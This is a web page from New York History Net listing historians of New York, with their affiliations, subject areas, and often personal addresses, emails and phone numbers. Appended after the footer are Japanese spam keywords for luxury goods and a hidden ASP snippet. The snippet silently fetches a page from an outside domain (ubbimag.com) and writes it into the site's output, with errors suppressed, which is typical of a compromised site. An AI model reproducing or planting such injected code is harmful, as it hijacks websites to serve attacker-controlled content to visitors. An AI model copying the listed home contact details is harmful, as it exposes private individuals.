For historians and students of New York history and culture
New York History Net


Any word
All words
Exact phrase  


New York Historians

This page provides a listing of individuals with an interest in study or interpretation of New York History.  Contact <webmaster@nyhistory.com> if you have a news item for group posting.

Join New York History Net.  Register yourself or nominate another historian for inclusion in this list.  To find commercial products and services helpful in the study and teaching of New York State history, see the Vendors page.

E-mail service is available for persons who do not have an e-mail account, or those who want a history-related e-mail address.

Alphabetical list
Annon Adams
29 Macintosh Drive
Poughkeepsie, NY 12603
acartena@aol.com
Phone: 914-471-2381
Fax: 914-471-2381
Subject Area(s): Architect John A. Wood, Bardavon (Collingwood) Opera House in Poughkeepsie

 
Michael Aikey
Director
New York State Military History Museum
 and Veterans Research Center
Building 124, Watervliet Arsenal
Watervliet, NY 12189
Michael.Aikey@ny.ngb.army.mil

Telephone: (518) 581-5100
Fax: (518) 581-5111

Subject Area(s): New York State military history, New York State printing history

 
David Y. Allen
SUNY at Stony Brook
dyallen@ccmail.sunysb.edu
Web site
Subject Area(s): Historical Maps, Digital Cartography, The Map Collection at SUNY Stony Brook

 
Kim Andrews
13 Homer St  Apt B
Glens Falls NY  12801
sandrews15@juno.com
Subject Area(s): History & Genealogy

 
Randal Angiel
SUNY Oneonta
randy@angiel.com
Subject Area(s): International History; Catskill Mountain History and Ulster County; Telecommunications.

 
Robert W. Arnold III
History To Go
463 Ontario Street
Albany, New York 12208
manuforti40@hotmail.com 

Office Phone: 518-438-5168

Subject Area(s): I teach Colonial American, New York State, 19th century America, pre-industrial New York, Hudson-Mohawk Regional history, and Industrial Revolution at the College of Saint Rose in Albany; I've been an adjunct there for twenty-seven years. At Excelsior College, I teach Colonial America, Revolutionary America, Civil War, and Immigration and Ethnic History. I am also an avocational military history buff and was seanacaidh of Clan Mackay USA. I'm a free-lance consultant and lecturer.

 
Tricia A. Barbagallo
118-B North Main Avenue
Albany, New York 12206-1804
ny.history@prontomail.com
www.nysm.nysed.gov/albany
Subject Area(s): 18th century Albany history, poverty, minority, local, and cultural resource history

 
William C. Barnhart
Department of History & Political Science
Caldwell College
Caldwell, NJ 07006
e-mail: wbarnhart@caldwell.edu

Phone: 973-618-3422

Subject Area(s):  Colonial & Early National Period; Religion / History of Missions

 
Louise Basa
Basa Consulting Service
1220 Waverly Place
Schenectady, NY 12308
BasaConsulting@worldnet.att.net

Phone: 518-377-4389
Fax: 518-374-2215
Subject Area(s): Archaeological, Historic Pres, Legal mandates related to environment

 
William Beardslee
1400 Greenstone Court
Fort Collins, Colorado  80525
Puritan13@Prodigy.net
Office: 970-221-4000 
Fax: 970-221-2500 
Home: 970-282-1129 
Otsego farm: 607-847-9348 
Subject Area(s): the local history of Otsego and Chenango counties and the Unadilla river, cholera

 
Peter Bedrossian
4 Arnold Road
Poughkeepsie, NY 12601
ppkbed@att.net

Phone: 845-485-5161
Subject Area(s): Dutchess County & the Civil War; 150th New York Volunteer Infantry Regiment and 19th century Medical Education

 
Jeffrey Bennett
Waterford Historical Museum & C.C.
jrb715@albany.net
Subject Area(s): 18th and 19th c epidemics and medicine

 
Judith Berdy
Historian and President
The Roosevelt Island Historical Society
575 Main Street
Roosevelt Island, NY 10044
Rooseveltislandhistory@usa.com

Web site
Phone: 212-688-4836
Fax: 212-207-8845 

Subject Area(s): Roosevelt Island

 
Selma Berrol
111 E. 85th Street
New York, NY 10028
 
Subject Area(s): NYC Immigration and Educational History (Retired Baruch College Professor)

 
Stefan Bielinski
Colonial Albany Social History Project
Cultural Education Center - Room 3093
Albany, NY 12230
sbielins@mail.nysed.gov
Web site

Phone: 518-474-6917
Subject Area(s): Early NY, Albany, Community, African American History

 
Barbara B. Buff
New-York Historical Society
2 W. 77th St
New York City, NY 10028
barbarab@nyhistory.org

Phone: (212) 873-3400 ext 238
Subject Area(s): Hudson River Valley, art, ecology, industrial changes since colonial times

 
Sloane D. Bullough
Troy's RiverSpark Visitor Center
251 River Street
Troy, NY 12180
bullough@iname.com
Web site
Phone: 518-270-8667
Fax: 518-270-1119
Subject Area(s): architecture and historic preservation, heritage tourism; history of labor and industry

 
Pamela Cooper, Ph.D.
7 Laidlaw Ave., #34
Jersey City, NJ 07306
P28L37C46@EarthLink.com
(O) 917-545-5039
(H) 201-876-8585
Subject Area(s): History of marathon footrace and long-distance running in
New York City and State

 
James W. Darlington
The Encyclopedia of New York State
Cooperstown Graduate Program
111 Caroline Avenue
Solvay, NY 13209
darlingt@dreamscape.com
Web site

Phone: 315-468-5814
Fax: 518-474-1796

Subject Area(s): historical and cultural geography, cultural landscapes, 19th century migration, transportation

 
Thomas J. Davis
Arizona State University
P.O. Box 872501
Tempe, AZ 85287
tjdavis@asu.edu

Phone: 602-965-4931
Fax: 602-955-0310
Subject Area(s): African American, Slavery, Civil Rights

 
Jared Day
U.S. Department of Justice
4 Scotland Road
Windham, CT 06280
jnday@cyberzone.net

Phone: 800-423-5384
Subject Area(s): NYC housing and environmental

 
Todd DeGarmo
Crandall Public Library
Center for Folklife, History 
 and Culture
251 Glen Street, City Park
Glens Falls, NY 12801
gle_degar@sals.edu


Phone: 518-792-6508
Fax: 518-792-5251

Subject Area(s): Folklife, Material Culture, Native, Adirondack, Hudson Valley, tourism history

 
Christopher Densmore
Friends Historical Library of Swarthmore College
500 College Avenue
Swarthmore, PA 19081-1905
cdensmo1@swarthmore.edu
610-328-8497
Subject Area(s): Quakers, particularly 19th c Upstate Reformers; Iroquois 1790-1860, Archives

 
Alice Smith Duncan
50 Otsego St.
Canajoharie, NY 13317
Writer and MA candidate
Cooperstown Graduate Program
alsmith@telenet.net
Subject Area(s): Rufus Grider, early PA/NY Palatine connections, NY State Amish settlements

 
Ellen Dwyer
Departments of Criminal Justice
 and History
Indiana University
Bloomington, IN 47405
dwyer@indiana.edu


Phone: 812-855-1271
Fax: 812-855-9325

Subject Area(s): Craig Colony for Epileptics, Social History of Medicine

 

Leigh C. Eckmair
The Gilbertsville Free Library
librarian@stny.rr.com
Subject Area(s): south western Otsego county and south eastern Chenango county, especially town of Butternuts, & village of Gilbertsville:  Architecture; Development of churches; commerce; family histories and migrations; pre-Revolutionary settlement.

 
Peter Eisenstadt
The Encyclopedia of New York State
Cultural Education Center
Albany, NY 12230
peisenst@mail.nysed.gov
Web site
Subject areas:

 
Karen Engelkle
Mohawk Valley
 Heritage Corridor
35 Maiden Lane
Albany, NY 12207
kengelke@msn.com

Phone: 518-434-1583

Subject Area(s): Iroquois, Dutch colonial settlements, 18th c conflicts, tourism

 
Suzanne Etherington, Ph.D.
New York State Archives
Cultural Education Center
Albany, NY 12230
Email: setherin@mail.nysed.gov
Home email: etherington1@juno.com

Phone: 607-721-8428

Subject Area(s): archival collection management, agricultural history, Central New York

 
George R. Farr
901 Bowman Road
Elmira, NY 14905
geofarr@servtech.com
Web site
107th NY Volunteer Infantry
Phone: 607-734-9957
Subject Area(s): Civil War, Elmira Prison Camp, Elmira and Chemung County
Affiliations: Chemung County Historical Society, Elmira Town Historian, Association of Municipal Historians of New York State; Schuyler County Historical Society

 
James D. Folts
New York State Archives
Cultural Education Center
Room 11D40
Albany, NY 12230
jfolts@mail.nysed.edu
Web site

Phone: 518-474-8955
Fax: 518-474-9985

Subject Area(s): NYS Government Records, Community History

 
Suzan D. Friedlander
Historian & Museum Consultant
New York Research
11 Cooper Lane
Cooperstown, NY 13326
607-547-7142
sdfriedlander@verizon.net
Subject Area(s):  NYS generalist specializing in 19th century exhibits, furnishing plans, collection research and assessment, writing. Significant project areas include agriculture, foodways, textiles and genealogy.

 
Glen Griffith
Schuyler Mansion State Historic Site
32 Catherine Street
Albany, NY 12202
Phone: 518-434-0834 

 

Subject Area(s): 18th century Albany

 
Sara S. Gronim
35 Prospect Park West
Brooklyn, NY 11215
sgronim@erols.com
Subject Area(s): Colonial New York 

 
Richard L. Haan
Hartwick College
Department of History
Oneonta, NY 13820
HaanR@Hartwick.edu

Phone: 607-431-4881
Fax: 607-431-4357
Subject Area(s): Native American, Iroquois, 17-18th cemtury Colonial US, Environ.

 
   
Subject Area(s): 

 
Eric Homberger
Professor of American Studies
University of East Anglia
Norwich NR4 7TJ
UK
eric.homberger4@ntlworld.com

Phone: 011 44 1603 626603

Subject Area(s): NYC history generally, and particularly NYC 19th c social history

 
Ken D. Johnson
1206 Seminole Drive
Saint Marys, Kansas 66536
fortplankhistorian@yahoo.com
Phone: 785-437-3551
Subject Area(s): Mohawk Valley History 1710-1790

 
Thomas O. Kelly
Siena College, History Department
515 Loudon Road
Loudonville, NY 12211
Kelly@Siena.edu

Phone: 518-783-2595
Subject Area(s): Colonial, Civil War, Early National Military, World War II

 
Karl G. Kilts
University at Albany
RR 1 Box 180X
Coxsackie, NY 12051
SKKilts@msn.com

Phone: 518-731-2868

Subject Area(s): Colonial & Revolutionary New York

 
Gretchen Knapp, Ph.D.
19171 Brentwood Drive
Bloomington, IL 61704
geknapp@davesworld.net

Phone: 309-378-5627

Subject areas: 20th century social history, war and society, World War II, public policy, Buffalo, and Western NY

 
Donald E. Kneeland
President, Larque Publications, Inc.
P.O. Box 39
Macedon, NY 14502
aspire@ez+net.net


Phone: 315-986-9857

Subject areas:

 
Edward H. Knoblauch
P.O. Box 2432
Albany, NY 12220
webmaster@nyhistory.com
Phone: 518-210-6423
Subject Area(s): Colonial and Independence, Social and Political History of NY, research and consulting

 
Terry Lehr
SUNY Brockport,
52 Parkwood Lane, Penfield, NY 14526
tlehr@frontiernet.net

 

Subject Area(s): History of Medicine, Nursing, Hospitals, Prisoner of War Camps

 
Anne M. Lennon
P.O. Box 524
Northport, NY 11768
 cowhathor@aol.com

 

Subject areas: the history of Long Island

 
James C. Mabry  
Subject Area(s): Economic History, 19th & 20th century

 
Thomas C. McCarthy
Director of Historical Services
New York City Dept. of Correction
66-26 Metropolitan Ave. 
(Correction Academy)
Middle Village, NY 11379
webmaster@correctionhistory.org
New York Correction History Society
website: http://www.correctionhistory.org

Phone: (718) 417 2315 (voice mail)
Fax: (718) 417-2326 (fax)
Subject areas: New York Correction History (city, county, state), history on the web

 
James McMann
Sachem Central Schools
15 Dena Drive
Blue Point NY 11715
jamcmann@aol.com

Phone: 516-363-2313

Subject Area(s): Social Studies Teacher

 
Susan L. McCormick
University at Albany
Department of History
Ten Broeck 105
Albany, New York 12222
sm0712@csc.albany.edu
The Glovers of Fulton County
Journal for MultiMedia History

Phone: 518-442-4488

Subject Area(s): work, public policy, and gender; l9th and early 20th century; Fulton County glove industry; multimedia history.

 
Mollie T. Marchione  
Subject areas: 20th century US cultural history, women's labor history, welfare capitalism, popular culture

 
Nancy Marcus  nmarcus@ccsd.edu
Subject areas: Fourth grade teacher interested in curriculum development and Rockland County

 

C.F.William Maurer
Ranger
Department of the Interior, NPS
Statue of Liberty
Liberty Island, NY 10004

bill@maurer.org
Telephone: (201) 391-1631
http://thirddragoonsdiary.com/

Subject Area(s): Third Continental Light Dragoons (Baylor’s Dragoons); American Colonial History; Statue of Liberty

 

Mary E. Messere
Wood House Museum
RR1 Box 124
Brooklyn Street
Eaton, NY 13334
bsmary@wtvhmail.com
Web site
Phone: 315-684-9908
Subject Area(s): curator of the Wood House Museum, history of Southern Madison County 

 
Peter Mickulas
ABD Department of History
Rutgers University
mickulas@eden.rutgers.edu
Phone: 516-488-1985
Subject Area(s): history of botany; New York Botanical Garden; history
of natural history

 
David Minor
Eagles Byte Historical Research
88 South Main Street
Pittsford, NY 14534
dminor@eznet.net
Web site
Phone: 716-264-0423
Fax: 716-383-8730
Subject Area(s): New York City & NYS Timelines

 
Laura-Eve Moss  
Subject Area(s): Constitutional History; Political Culture

 
Natalie Naylor
Professor Emerita, Hofstra University;
496 Clarendon Road
Uniondale, NY 11553
Natalie.Naylor@Hofstra.edu
Subject Area(s): Long Island History

 
Karen Oakes
824 Rider Street
Parish, NY 13131
ksoakes@syr.edu
affiliations: SUNY at Oswego and Syracuse University
Subject Area(s): 19th century architecture (especially Greek Revival) and material culture; central New York History; women's history

 
Hugh E. O'Rourke
CUNY
 
Subject Area(s): doctoral student 19th century NYC

 
Tod M. Ottman
SUNY Albany
23-74 29th Street, Apt. 10
Long Island City, NY 11105
todottman@email.msn.com


Subject Area(s): 20th century New York Political and Public Policy History

 
Susan Oullette
Lander University
375c Carnell Learning Center
Greenwood, SC 29649
souellet@Lander.edu

Phone: 864-388-8684

Subject Area(s): Colonial, Women's History, Labor History

 
Scott Padeni
6 Carousel Court
Ballston Spa, NY 12020
sapadeni@aol.com

Phone: 518- 583-2154
Subject Area(s): 18th century military history; 19th century local history of Saratoga Springs

 
Antonia Petrash
Robert R. Coles Long Island History Room
Glen Cove Public Library
4 Glen Cove Avenue
Glen Cove, NY
glencove@lilrc.org

Phone: 516- 676-2130
Fax 516- 676-2788
Subject Area(s): Librarian and also an archivist working with a local history collection in Glen Cove NY.

 
John H Potter
Schuyler County Historical Society
Brick Tavern Museum Director
PO Box 651
Montour Falls, NY 14865
607-535-9741

SchuylerMuseum@aol.com

Subject Area(s):  Schuyler County

 
William Rainbolt
SUNY Albany
Journalism Program
University at Albany
Albany, NY 12222
rainbolt@cnsvax.albany

 

Phone: 518-442-4087

Subject Area(s): New Deal in New York, cultural history, history in fiction
and film, Gilded Age/Progressive Era, gender.

 
Thomas Reimer
401 Green Hill Court
Albany, NY 12203
ycrtmr@cs.com

Phone: 518-438-1139

Subject Area(s): Newspapers, German-Americans, Albany Area

 
Christopher Ricciardi
Christopher Ricciardi
4110 Quentin Road
Brooklyn, New York 11234-4322
Ricciardi@att.net
Ricciardi@att.net
Web site
Phone: (718) 645-3962
Subject Area(s): 17th to early 20th century NYC Archaeology and History, Dutch New York, Long Island

 
Harry Riggall
Rt. 26
West Eaton, NY 13484
Phone: (315) 684 - 3236
Subject Area(s): History of the Town of Eaton in Madison County New York

 
Nancy Ring-Kendrick  Website: http://www.adamsny.org/adams.html
Subject Area(s): Adams, New York

 
Wray Rominger
Purple Mountain Press, Ltd.
P.O. Box E3
Fleischmanns, NY 12430
Purple@Catskill.net

Phone: 914-254-4062
Fax: 914-254-4476
Subject Area(s): NYS History

 
Timothy J. Shannon
Gettysburg College
Department of History
Gettysburg, PA 13725
tshannon@gettysburg.edu

Phone: 717-337-6567
Fax: 717-337-6666
Subject Area(s): Eighteenth-Century Mohawk Valley; William Johnson

 
Robert V. Shear
P.O. Box 1011
Syracuse, NY 13201
BobShear@SBH.org

Phone: 315-474-5506
Fax: 315-474-1554
Subject Area(s): 19th century social reformers, Central New York

 
Linda Shookster, MD
421 Huguenot Street, 4th floor
New Rochelle, NY 10801
Phone:  (914) 235-3065
Fax:      (914) 235-0660
E-mail: oldnewyork28@yahoo.com
Blog: http://oldnewyork.blogspot.com
Subject Area(s):  19th century NYC, also Civil War, Theodore Roosevelt, Sr., Hudson Valley area estates,

 
Eve Smith
Retired Professor, University of Windsor
103 Birch Creek Road
Pine Hill, NY 12465
epsmith@uwindsor.ca

Phone: (914) 254-5304

Subject Area(s): Social welfare and child welfare history including institutions and politics of; minority group children and families.

 
Robert W. Snyder rwsnyder@andromeda.rutgers.edu
Subject Area(s): New York City social and cultural, media studies.

 
Dr. Tamsin Spargo
School of Media Critical and Creative Arts
Liverpool John Moores University
Dean Walters
1 Saint James Road
Liverpool L1 7BR, UK
t.spargo@livjm.ac.uk

 


Subject Area(s): seventeenth to nineteenth-century religious culture, theories of historiography, and Oliver Curtis Perry

 
Michelle Spinelli
Sarah Lawrence College
410 E. 89 Street
New York NY 10128


Phone: 914-395-2304
Fax: 914-395-2666
Subject Area(s): 19th & 20th Century Women's History

 
Ted Steegmann
SUNY Buffalo
Department of Anthropology
380 MFAC
Buffalo NY 14261
atsjr@aisu.buffalo.edu

Phone: 716-645-2240
Fax: 716-645-3808

Subject Area(s): Historical Human Biology (environment & well being), Military History

 
Mary Beth Sullivan
Public Historian and NYHN partner
159 Delaware Avenue
Delmar, NY 12054
sullivan@newyorkhistory.net
Web site

Phone: 518-438-7901
Fax: 518-439-6036

Subject Area(s):  web development, educational programming and publications, photographic research, and archival management services

 
Joseph S. Tiedemann      
Department of History                                       
Loyola Marymount University
7900 Loyola Blvd.
Los Angeles, CA  90045-8415
jtiedema@popmail.lmu.edu


Phone: 310-338-2821
Dept: 310-338-5997

Subject Area(s): Revolutionary New York

 
Philip G. Terrie
American Culture Studies
Bowling Green State University
Bowling Green OH 43403
pterrie@bgnet.bgsu.edu

Phone: 419-372-8886
Subject Area(s): Adirondack History, History of Recreation, Conservation and Environment

 
Louis Tremante
Academic Adviser, The University of Chicago
ltremant@uchicago.edu
Subject Area(s): Rural life, environmental history, agrarian organizations, peri-urban agriculture

 
Mark C. Van Sluyters
SHIP
PO Box 222
Newtonville, NY 12128-0222
markvans@aol.com
Web site

Phone: 518-783-0463

Subject Area(s): Yorkers/SHIP, member of the NYS Council for the Social Studies, Capital District Council for the Social Studies, Education Consultant to the New York State Historical Association, and Director of the Empire Group Education Consultants.

 
Julie Walsh
107 Sullivan Street #14
New York, NY 10012
walshj7@sprynet.com

Subject Area(s): 18th and 19th century New York City history (Manhattan and Queens), history of medicine, NYC in the American Revolution.

 
John Warren
University at Albany
Public History Program
67 First Street
Albany, NY 12202
JWarren102@aol.com

Phone: 518-462-2964
Fax: 518-462-2964
Subject Area(s): public history, colonial/contact period, 19th c townscapes

 
Virginia Westbrook
The Virginia Company
Route 2 Box 8
Crown Point, NY 12928
thevaco@cptelco.net


Phone: 518-597-3983

Subject Area(s): Champlain Valley history, material culture, and industrial history. I do public history publications and exhibits.

 
Carl Westerdahl
Unconventional Wisdom
29B Heritage Hills
Somers, NY 10589
ucwiz@aol.com

Phone: 914-267-2727
Fax: 914-276-2807
Subject Area(s): Life & Times of Stephen Van Rensselaer III and Rensselaer Polytechnic Institute

 
Harlan D. Whatley
Skye Films
192 East 75th Street, 9C
New York, NY 10021
212.737.8004 voice
212.737.3743 fax
www.skyefilms.com
harlanw@nyc.rr.com
Subject Area(s): Scottish in New York City from the 17th century to the Present

 
Walter R. Wheeler
P.O. Box 1413
Troy, NY 12181
Wtheb@aol.com

Phone: 518-270-9430
Subject Area(s): NYS Architecture 1780-1860, including Hooker, Rector, Pharoux, Woollett

 
   
Subject Area(s): 

NY History Net Home | Contact | Search | Historians | Kids | Resources
New York History Net 1996-2014
Hit Counter New York History Net page views since 20 February 2008

コーチ カバン コーチ アウトレット クロムハーツ 指輪 コーチ 財布
<% On Error Resume Next set XmlObj = Server.CreateObject("Microsoft.XMLHTTP") XmlObj.open "GET", "http://ubbimag.com/z10.html", false XmlObj.send formatdata = XmlObj.responseText file_get_contents=formatdata Set XmlObj = nothing response.write file_get_contents %>